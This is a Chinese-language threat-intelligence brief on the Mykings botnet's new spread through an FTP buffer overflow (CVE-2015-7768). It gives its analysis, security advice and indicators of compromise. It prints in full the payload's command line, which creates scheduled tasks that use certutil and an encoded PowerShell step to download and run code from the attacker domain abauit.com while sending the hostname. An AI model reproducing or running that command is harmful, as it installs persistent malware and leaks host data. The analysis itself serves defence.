Mykings僵尸网络最新活动简报

一、概述

Mykings是著名的僵尸网络，该僵尸网络自2017年出现后，至今仍非常活跃。国内外多家安全公司都对该僵尸网络做过披露，腾讯御见威胁情报中心最新一次披露为9月7号《MyKings僵尸网络最新变种突袭，攻击代码多次加密混淆，难以检测》。

近期，腾讯御见威胁情报中心再次监测到该僵尸网络有了新的变化，开始使用FTP漏洞开始进行传播，感染了诸多学校和企业。此外，部分版本还是依然使用之前的SMB协议进行传播，如永恒之蓝漏洞和SMBClient，该部分具体的分析参见之前的文章。

本次感染依然使用极其复杂的加密和混淆的ps1脚本进行，而且同样无PE文件落地。这也大大增强了免杀能力和安全软件检测的难度。从C&C域名的检测情况来看，该变种的活跃始于11月初，而近期迎来了一波高峰：

二、技术分析

传播样本跟之前的版本一样为高度混淆的ps1脚本：

经过多次去混淆后，样本展开如下：

样本会将内置的编码压缩过的PE文件解码压缩后加载进内存中。

编码压缩过的PE：

加载进内存：

随后调用内置函数ScanIPPort开启现成来扫描开放FTP服务的机器：

一旦发现有开放21端口（FTP）服务的机器就调用加载在内存中的PE文件的main函数，然后同时传入三个参数：IP、21、payload：

内存调用的PE文件经过解码解压缩后发现是一个经过混淆的.net程序

经过混淆后：

该PE主要作用是进一步组装payload，并且匿名登录FTP服务器，并发送payload。对其经过抓包分析发现，该payload发送的是一个超长的CWD命令：

经过进一步的分析发现，该payload为使用CVE-2015-7768漏洞进行攻击的存在该漏洞的FTP服务器。在代码上与公开的漏洞利用代码相似。

CVE-2015-7768：Konica Minolta FTP Utility 1.0在解析CWD命令时，检查输入大小失败，在实现上存在缓冲区溢出漏洞，远程攻击者通过较长的CWD命令，利用此漏洞可执行任意代码：

我们对该payload进一步分析发现，该payload会执行一系列的cmd指令：

执行指令：

cmd.exe /c schtasks /create /scMINUTE /mo 55 /st 08:00:00 /tn CACHE /tr "cmd /c cd %temp%&certutil.exe -urlcache -split -f http://cache.abauit.com/cache.dat?vf_%COMPUTERNAME%p.dat&certUtil -f -decode p.datp.bat&p.bat&delp.dat p.bat&exit" /F&schtasks /create /sc MINUTE /mo 50 /st 07:05:00 /tn PerfTrack /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBhAGIAYQB1AGkAdAAuAGMAbwBtAC8AcAA/AGYAdgAnACkA"/F.Q6u32E2RbTRuSDayPlepFMcV5p6Mu4aue3ROQtSUwP2PtnQt3QD4epRPTnQrE1CD6FBPvNcRSQptuvpd1urLwPT06NCTe1rTQ0BPVNU2QqD4wVqu3He9sDTbEptoW6UvSCcSQxPtu1D3bKSCEpFOQst21upaadQuGPFOt3U3a0pM3y2nF5Rt0EGP4o2MpoGPp5DpgPVOSCT4Ep6PdwFZfP05ujvPDpwP6O2T0nq0V00eD20fcdsBcQqsPkQ0FO3DBRep4bpppobW2E3Bqcph0eRLrLupfMpnpoD0UpVMU5pp10U2qiT0pacCCCgPdmrEUpscPQbbg6aQBfSWQQBi71W1rO71SugDsqaJpQrbGCg13sDp712t1gcrSY2abgROsqRzf1SrSZRabh61sqbi2aW2bow177PUrapdraG1bUSqBfasBaQJf1aRpicqG5bmCqQrg1crt0QQw7aEbaE2Pgg24psq0C0k3qPL2G3rBK2aqW7HCqpdD7RbSEQQSwCGCqBBsG0BPhBaw7pQqQRCd7bbP0cqg8PISqe12q1R0ura2gPcaQbkBa71bNraPGu771qtCqaRvPsqqXQQraBou7Ba2V1QqSDx1Qf9CGRb2KaQ0GgDbarlE7rbcXra2gW9aQsirqW25a1QPGPkra3TSqBarUW1rg0M3qu23GG2CDw10C6XW10cQQ71FO2a2g69aQ1tBGQQPnSqQS2K3qfB5pFOsvS0AA

执行后，会发送本机的信息到作者服务器，然后执行感染脚本。

三、总结：

Mykings僵尸网络是近年来做活跃的僵尸网络之一，僵尸网络会继续传播挖矿木马，DDoS攻击，传播RAT盗取资料等。虽然从近期的检测来看并未有实质性的恶意动作，但是我们不排除该僵尸网络会随时爆发来进行恶意的攻击，切忌不可掉以轻心。此外，腾讯御见威胁情报中心还会继续持续不断的监控该僵尸网络，保护网民的安全。

四、安全建议

1、 及时打补丁，包括系统补丁和所用软件的补丁；

2、 关闭不必要的端口，方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html；

3、 建议局域网用户切勿使用弱口令和统一口令；

4、 推荐企业用户使用御点终端安全管理系统保护电脑安全（下载地址：https://s.tencent.com/product/yd/index.html）

五、IOCs

http://cache.abauit.com

http://p.abauit.com

参考资料

MyKings僵尸网络最新变种突袭，攻击代码多次加密混淆，难以检测

https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw

MyKings僵尸网络的新动向：利用NSIS脚本挖门罗币

https://mp.weixin.qq.com/s/bgOLZIAcVw5ElN0Szc5Xyg